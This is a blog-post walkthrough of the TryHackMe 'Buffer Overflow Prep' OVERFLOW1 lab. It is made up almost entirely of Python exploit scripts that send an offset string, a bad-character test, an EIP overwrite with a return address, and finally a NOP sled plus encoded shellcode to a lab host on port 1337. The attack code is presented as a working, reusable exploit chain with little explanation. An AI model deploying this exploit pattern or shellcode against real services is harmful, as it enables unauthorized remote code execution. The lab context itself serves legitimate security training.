Buffer Overflow Prep — OverFlow1- TryHackMe

import socketimport sys
message = b"OVERFLOW1 " #Notice the space in the end
payload = message + b"A" * 1978 + b"B" * 4

try:
print("Sending payload...")
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.10.194.7',1337))
s.recv(1024)
s.send(payload + b'\r\n')
s.recv(1024)
s.close
except:
print("Cannot connect to server")
sys.exit()
import sysmessage = b"OVERFLOW1 " #Notice the space in the end

badchars = ( b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

payload = message + b"A" * 1978 + b"B" * 4 + badchars #Bad chars in the end
try:
print("Sending payload...")
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.10.194.7',1337))
s.recv(1024)
s.send(payload + b'\r\n')
s.recv(1024)
s.close

except:
print("Cannot connect to server")
sys.exit()
import socket
import sys

message = b"OVERFLOW1 " #Notice the space in the end
ret = b"\xaf\x11\x50\x62" #This will replace the B's which were at EIP
payload = message + b"A" * 1978 + ret

try:
print("Sending payload...")
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.10.194.7',1337))
s.recv(1024)
s.send(payload + b'\r\n')
s.recv(1024)
s.close

except:
print("Cannot connect to server")
sys.exit()
unsigned char buf[] = 
“\xda\xc6\xb8\x92\xf3\x5c\x06\xd9\x74\x24\xf4\x5b\x31\xc9\xb1”
“\x52\x83\xc3\x04\x31\x43\x13\x03\xd1\xe0\xbe\xf3\x29\xee\xbd”
“\xfc\xd1\xef\xa1\x75\x34\xde\xe1\xe2\x3d\x71\xd2\x61\x13\x7e”
“\x99\x24\x87\xf5\xef\xe0\xa8\xbe\x5a\xd7\x87\x3f\xf6\x2b\x86”
“\xc3\x05\x78\x68\xfd\xc5\x8d\x69\x3a\x3b\x7f\x3b\x93\x37\xd2”
“\xab\x90\x02\xef\x40\xea\x83\x77\xb5\xbb\xa2\x56\x68\xb7\xfc”
“\x78\x8b\x14\x75\x31\x93\x79\xb0\x8b\x28\x49\x4e\x0a\xf8\x83”
“\xaf\xa1\xc5\x2b\x42\xbb\x02\x8b\xbd\xce\x7a\xef\x40\xc9\xb9”
“\x8d\x9e\x5c\x59\x35\x54\xc6\x85\xc7\xb9\x91\x4e\xcb\x76\xd5”
“\x08\xc8\x89\x3a\x23\xf4\x02\xbd\xe3\x7c\x50\x9a\x27\x24\x02”
“\x83\x7e\x80\xe5\xbc\x60\x6b\x59\x19\xeb\x86\x8e\x10\xb6\xce”
“\x63\x19\x48\x0f\xec\x2a\x3b\x3d\xb3\x80\xd3\x0d\x3c\x0f\x24”
“\x71\x17\xf7\xba\x8c\x98\x08\x93\x4a\xcc\x58\x8b\x7b\x6d\x33”
“\x4b\x83\xb8\x94\x1b\x2b\x13\x55\xcb\x8b\xc3\x3d\x01\x04\x3b”
“\x5d\x2a\xce\x54\xf4\xd1\x99\x50\x01\xbb\x99\x0d\x13\x3b\x3d”
“\xc1\x9a\xdd\x2b\xcd\xca\x76\xc4\x74\x57\x0c\x75\x78\x4d\x69”
“\xb5\xf2\x62\x8e\x78\xf3\x0f\x9c\xed\xf3\x45\xfe\xb8\x0c\x70”
“\x96\x27\x9e\x1f\x66\x21\x83\xb7\x31\x66\x75\xce\xd7\x9a\x2c”
“\x78\xc5\x66\xa8\x43\x4d\xbd\x09\x4d\x4c\x30\x35\x69\x5e\x8c”
“\xb6\x35\x0a\x40\xe1\xe3\xe4\x26\x5b\x42\x5e\xf1\x30\x0c\x36”
“\x84\x7a\x8f\x40\x89\x56\x79\xac\x38\x0f\x3c\xd3\xf5\xc7\xc8”
“\xac\xeb\x77\x36\x67\xa8\x98\xd5\xad\xc5\x30\x40\x24\x64\x5d”
“\x73\x93\xab\x58\xf0\x11\x54\x9f\xe8\x50\x51\xdb\xae\x89\x2b”
“\x74\x5b\xad\x98\x75\x4e”;
import socket
import sys

message = b"OVERFLOW1 " #Notice the space in the end

shell_code = (b"\xda\xc6\xb8\x92\xf3\x5c\x06\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
b"\x52\x83\xc3\x04\x31\x43\x13\x03\xd1\xe0\xbe\xf3\x29\xee\xbd"
b"\xfc\xd1\xef\xa1\x75\x34\xde\xe1\xe2\x3d\x71\xd2\x61\x13\x7e"
b"\x99\x24\x87\xf5\xef\xe0\xa8\xbe\x5a\xd7\x87\x3f\xf6\x2b\x86"
b"\xc3\x05\x78\x68\xfd\xc5\x8d\x69\x3a\x3b\x7f\x3b\x93\x37\xd2"
b"\xab\x90\x02\xef\x40\xea\x83\x77\xb5\xbb\xa2\x56\x68\xb7\xfc"
b"\x78\x8b\x14\x75\x31\x93\x79\xb0\x8b\x28\x49\x4e\x0a\xf8\x83"
b"\xaf\xa1\xc5\x2b\x42\xbb\x02\x8b\xbd\xce\x7a\xef\x40\xc9\xb9"
b"\x8d\x9e\x5c\x59\x35\x54\xc6\x85\xc7\xb9\x91\x4e\xcb\x76\xd5"
b"\x08\xc8\x89\x3a\x23\xf4\x02\xbd\xe3\x7c\x50\x9a\x27\x24\x02"
b"\x83\x7e\x80\xe5\xbc\x60\x6b\x59\x19\xeb\x86\x8e\x10\xb6\xce"
b"\x63\x19\x48\x0f\xec\x2a\x3b\x3d\xb3\x80\xd3\x0d\x3c\x0f\x24"
b"\x71\x17\xf7\xba\x8c\x98\x08\x93\x4a\xcc\x58\x8b\x7b\x6d\x33"
b"\x4b\x83\xb8\x94\x1b\x2b\x13\x55\xcb\x8b\xc3\x3d\x01\x04\x3b"
b"\x5d\x2a\xce\x54\xf4\xd1\x99\x50\x01\xbb\x99\x0d\x13\x3b\x3d"
b"\xc1\x9a\xdd\x2b\xcd\xca\x76\xc4\x74\x57\x0c\x75\x78\x4d\x69"
b"\xb5\xf2\x62\x8e\x78\xf3\x0f\x9c\xed\xf3\x45\xfe\xb8\x0c\x70"
b"\x96\x27\x9e\x1f\x66\x21\x83\xb7\x31\x66\x75\xce\xd7\x9a\x2c"
b"\x78\xc5\x66\xa8\x43\x4d\xbd\x09\x4d\x4c\x30\x35\x69\x5e\x8c"
b"\xb6\x35\x0a\x40\xe1\xe3\xe4\x26\x5b\x42\x5e\xf1\x30\x0c\x36"
b"\x84\x7a\x8f\x40\x89\x56\x79\xac\x38\x0f\x3c\xd3\xf5\xc7\xc8"
b"\xac\xeb\x77\x36\x67\xa8\x98\xd5\xad\xc5\x30\x40\x24\x64\x5d"
b"\x73\x93\xab\x58\xf0\x11\x54\x9f\xe8\x50\x51\xdb\xae\x89\x2b"
b"\x74\x5b\xad\x98\x75\x4e")

ret = b"\xaf\x11\x50\x62" #This will replace the B's which were at EIP

payload = message + b"A" * 1978 + ret + b"\x90" * 32 #Add NOPs \x90

try:
print("Sending payload...")
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.10.194.7',1337))
s.recv(1024)
s.send(payload + shell_code + b'\r\n')
s.recv(1024)
s.close

except:
print("Cannot connect to server")
sys.exit()

--

--

--

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

LeetCode — Find All Numbers Disappeared in an Array

Building & Monitoring a Fullstack Serverless App

Fix USB Bluetooth Dongle From Getting Disconnected on Ubuntu 21.10

Best Tips to Increase Your Productivity in Python

Linux Basic Commands

Creating a setup so that you can ping Google but not Facebook at the same time.

The Promise of Pony’s Future

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xsanz

0xsanz

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

More from Medium

Hack the Box — Beep Writeup

TryHackMe — Jeff

Attacktive Directory THM — Walkthrough

CTF Walkthrough | TryHackMe | Freshly